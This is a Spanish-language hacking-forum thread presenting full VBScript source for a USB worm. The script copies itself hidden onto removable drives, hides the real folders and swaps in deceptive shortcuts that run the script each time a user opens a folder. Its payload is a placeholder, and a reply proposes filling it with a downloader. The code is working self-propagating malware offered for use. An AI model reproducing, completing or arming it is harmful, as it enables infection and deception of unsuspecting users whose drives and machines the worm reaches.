elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [vbs][source] spread usb
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [vbs][source] spread usb  (Leído 3,072 veces)
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
[vbs][source] spread usb
« en: 25 Abril 2014, 00:43 am »

hace lo siguiente :
oculta todas las carpetas y crea accesos directos de las carpetas , cuando  abren una carpeta o acceso directo . primero ejecuta el archivo vbs y luego abre la direccion de la carpeta
Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set RainbowDash = createobject("Scripting.FileSystemObject")
  3. Set discos = objfso.drives 'obtenemos la coleccion de discos
  4. if Wscript.Arguments.count > 0 Then
  5. ejecucion Wscript.Arguments(0)
  6. else
  7. For each d in discos 'por cada disco(d) en la coleccion(discos)
  8. 'mensaje con la letra de disco
  9. if d.drivetype = 1 Then
  10. Dim subfg,destino
  11. subfg=d.driveletter & ":\"
  12. destino="" & subfg & "wlok.vbs"
  13. if not(RainbowDash.FileExists(destino)) Then
  14. objfso.copyfile WSCript.ScriptFullName,destino,true
  15. set archivo=objfso.getfile(destino)
  16. archivo.attributes=39
  17. Set micarpeta = objfso.getfolder(subfg)
  18. Set subcarpetas = micarpeta.subfolders
  19. For each s in subcarpetas
  20. destino="" & subfg & "wlok.vbs"
  21. accesdirect s.name,subfg,destino
  22. oculto s.name,subfg
  23. Next
  24. End if
  25. End if
  26. Next
  27. End If
  28.  
  29. Function accesdirect(directorio,disco,destino)
  30. DIM muaja,acce,directiorio1,argumento
  31. directorio1= disco & directorio & ".lnk"
  32. argumento="""" & directorio & """"
  33. set muaja=WScript.CreateObject("Wscript.Shell")
  34. set acces=muaja.CreateShortcut(directorio1)
  35. With acces
  36. .TargetPath = destino
  37. .Arguments = argumento
  38. .WindowStyle = 1
  39. .IconLocation="C:\windows\System32\SHELL32.dll,3"
  40. .WindowStyle="1"
  41. .WorkingDirectory=disco
  42. .save
  43. End With
  44. End Function
  45.  
  46. Function oculto(directorio,disco)
  47. set carpetaoculta= objfso.getfolder(disco & directorio)
  48. carpetaoculta.attributes=39
  49. End Function
  50.  
  51. Function ejecucion(parametros)
  52. parametros="""" & parametros & """"
  53. set correr=WScript.CreateObject("Wscript.Shell")
  54. correr.run "explorer.exe " & parametros
  55. payload
  56. End Function
  57.  
  58. Function payload()
  59. msgbox("payload")
  60. End Function


« Última modificación: 25 Abril 2014, 00:49 am por daryo » En línea

buenas
.BrutuS

Desconectado Desconectado

Mensajes: 11



Ver Perfil
Re: [vbs][source] spread usb
« Respuesta #1 en: 10 Diciembre 2014, 04:24 am »

Buen codigo en el payload se le pone un codigo de downloader jeje  >:D


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[VBS] [SOURCE] Facebook y Twitter Spread « 1 2 3 »
Análisis y Diseño de Malware
Mad Antrax 27 23,344 Último mensaje 9 Diciembre 2014, 03:23 am
por .BrutuS
Duda sobre USB spread
Análisis y Diseño de Malware
jeshuem 9 3,911 Último mensaje 18 Marzo 2014, 22:37 pm
por xXSCORPIOXx
Metodo de USB Spread quefuncione?
Análisis y Diseño de Malware
Noblex07 2 3,412 Último mensaje 7 Junio 2014, 19:27 pm
por daryo
MOVIDO: Metodo de USB Spread quefuncione?
Ingeniería Inversa
.:UND3R:. 0 2,000 Último mensaje 30 Mayo 2014, 01:55 am
por .:UND3R:.
[VBS] [SOURCE] Dropbox Spread
Análisis y Diseño de Malware
.BrutuS 2 3,208 Último mensaje 9 Diciembre 2014, 22:12 pm
por .BrutuS
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines